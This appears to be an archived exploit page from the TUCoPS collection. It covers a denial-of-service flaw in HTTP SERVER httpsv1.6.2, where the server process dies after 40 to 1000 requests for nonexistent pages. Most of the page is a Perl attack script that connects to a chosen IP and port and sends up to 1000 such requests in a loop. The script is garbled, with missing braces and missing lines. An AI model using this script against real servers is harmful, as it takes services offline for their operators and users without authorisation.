TUCoPS :: HP Unsorted H :: tb11372.htm

HTTP SERVER (httpsv1.6.2) 404 Denial of Service
HTTP SERVER (httpsv1.6.2) 404 Denial of Service
HTTP SERVER (httpsv1.6.2) 404 Denial of Service

HTTP SERVER (httpsv1.6.2) 404 Denial of Services
Site: http://httpsv.sourceforge.net/ 
Info: If u send to the server between 40-1000 requests to nonexisting pages the process will die.
Bug Found By Prili - imprili[at]gmail.com

#GetOpt STD module
use IO::Socket;
use Getopt::Std;
if(defined $args{i}){
$ip = $args{i};
if(defined $args{p}){
$port = $args{p};
if(!defined $args{i} or !defined $args{p}){
print "-----------------------------------------------------\n";
print "HTTP SERVER (httpsv1.6.2) 404 Denial of Service\n";
print "Site: http://httpsv.sourceforge.net/\n "; 
print "Info: If u send to the server between 40-1000 requests\n";
print "to nonexisting pages the process will die.\n";
print "Found By Prili - imprili[at]gmail.com\n";
print "Usage: perl $0 -i  -p  \n";
print "Thanks to shinnai for the inspiration.\n";
print "-----------------------------------------------------\n";
$protocol = "tcp";
while ($i<=1000)
$request = "GET /AAAAAAA HTTP/1.0 \n\n";
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                               Timeout=>'1') || die "Can't connect to address!\n";
print "sending request number $i...\n";
print $socket $request;

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